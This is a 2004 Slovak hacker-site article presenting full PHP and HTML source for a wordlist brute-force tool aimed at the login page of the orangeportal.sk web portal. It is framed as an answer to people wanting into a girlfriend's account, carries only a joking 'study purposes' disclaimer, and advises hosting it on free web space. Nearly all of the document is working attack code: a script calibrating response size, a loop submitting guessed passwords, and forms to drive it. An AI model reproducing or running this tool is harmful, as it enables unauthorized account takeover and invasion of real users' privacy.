0ragn3 passw0rd checker

03.03.2004 18:47 | blackhole

redakcia blackhole sa zrieka akychkovlek nasledkov za neopravnene pozuzitie nasledujuceho clanku a skriptov.

!!! autor clanku nijako nezodpoveda za skody sposobene uzivanim tohto softwaru...zaroven upozornuje, ze clanok je len na studijne ucely...takze pouzitie na pachanie trestnej cinnosti nie je moj problem ;-D enj0y !!!

0ragn3 passw0rd checker
-----------------------
par typk0v mi stale dokola vypisuje ze \"prosim ta ako sa dostanem do sxranky mojej frajerky na orangeportali ? a tak...asi poznate\". tak som vypol irc, ved nemusim v praci stale \"pracovat\" a mrkol som sa na php, ze co dokaze...a celkom pohoda...nikdy som v nom nekodil, ale zacnem...je to fakt mocny nastr0j ;-) a tu teda dostavate ro ruky \"nebezpecny\" h3k3rskY n4str0j [f0000] na brutus atakus na oragenportal.sk...

na vysvetlenie:
v podstate to funguje asi takto...ak heslo uhadnete vrati sa vam pole pageText[] s velkostou vacsinou > 20...ak nie tak to je asi jasne ;-) odporucam spustit pred utokom getpass_checker.php aby ste si zistili tento rozsah...je zavisli v podstate na aktualnej strukture stranky...potom zeditovat getpass.php, hodit to na nejaky free web hosting a spustit...je to relativne pomale...ale ucinne... povodne som to xel robit inak...teraz to vlastne vzdy vrati celu stranku...dalo by sa to este riesit tak ze by sa stoplo loadovanie stranky ak uz je jasne ze nie je ta co xeme...tym by sa to v podstate dva krat zrychlilo...ak este niekt0 pouziva dial-up tak neodporucam pustat ;-)
a neodporucam pustat na domacom apachovi, pretoze za 1.sprava sa to dost divne...vsetko v pohode frci akurat to vypisuje trapne hlasky, ze connection failed a tak aj ked connection vobec neni failed... a za 2. by ste dost rychlo prisli o svoj adsl pausal ;-) je to riadny kopec komunikacie...ked som bol este maly a pekny a sprosty, tak som samozrejme ako spravny lamer pustil wwwhack a sposobil za 1 noc 9 GB komunikaciu ;-) takze tak...
/* th3 3nd */

ZDROJAKY:

getpass_checker.php
<?
function getData($URL)
{

if($URL == null)
{
echo(\"faka...\");
}

$fp= fopen($URL, r);

if ( !$fp )
{
echo(\"spojenie je v p***\");
}
else
{
$num=0;
while ( !feof($fp) )
{
$pageText[$num] = fread($fp,1024);
$num++;
}
}

$arrayLen=count($pageText);
return $arrayLen;
}
echo \"hranica: \";
echo getData(\"http://www.orangeportal.sk/portal/do_login.dwp?login=$nick1&pwd=$pas s1&page=\");
?>

getpass.php
<?
function getData($URL)
{
$allPage = \"\";

if($URL == null)
{
echo(\"Please specify a URL to get data from \");
}

$fp= fopen($URL, r);

if ( !$fp )
{
echo(\"Connection Failed\");
}
else
{
$num=0;
while ( !feof($fp) )
{
$pageText[$num] = fread($fp,1024);
$num++;
}
}

$arrayLen=count($pageText);

/* toto si treba zeditovat podla toho co vratil getpass_checker.php...namiest0 tej 19 ;-) */
if ($arrayLen <= 19)
{
$tak = 0;
}
else
{
$tak = 1;
}

return $tak;
}

echo \": phonw 0rang3 pass checker<br>\";
echo \"looking for file: $slov...\";

$sub = fopen($slov,\"r\");
if (!$sub)
{
echo \"not found<br>\";
exit;
}
else
{
echo \"ok<br>\";
}

$uhadol = 0;
while (!feof($sub))
{
$pass = fgets($sub,1024);
if (getData(\"http://www.orangeportal.sk/portal/do_login.dwp?login=$nick&pwd=$pas s&page=\") == 1)
{
echo \"password found...saving...\";
$sub_out= fopen($vystup,\"a\");
if (!$sub)
{
echo \"...failed<br>\";
}
else
{
echo \"...done<br>\";
echo \"hesielko: $pass\";
}
fputs($sub_out,$pass);
fclose($sub_out);

$uhadol = 1;
exit;
}
}

if (uhadol == 0)
{
echo \"n0thing for you...sorry<br>\";
$sub_out= fopen(\"vysledok\",\"w\");
fputs($sub_out,\"n0thing for you...\");
fclose($sub_out);

}
fclose($sub);
?>

getpass_checker.html
<html>
<title>: phonw password checker - hran|ca f|nd3r</title>
<center>
<body bgcolor=\"silver\">

<form name=\"checker\" action=\"getpass_checker.php\">
zly login:
<input type=\"text\" name=\"nick1\"></input><br>
<input type=\"text\" name=\"pass1\"></input><br>
<input type=\"submit\" value=\": g0 0rang3\"><br>
</form>
</center>
</body></html>

getpass.html
<html>
<title>: phonw password checker</title>
<center>
<body bgcolor=\"silver\">

<form name=\"checker\" action=\"getpass.php\">
user name:<input type=\"text\" name=\"nick\"><br>
wordlist:<input type=\"text\" name=\"slov\"><br>
output:<input type=\"text\" name=\"vystup\"><br>
<input type=\"submit\" value=\": g0 0rang3\">
</form>
</center>
</body></html>
phonw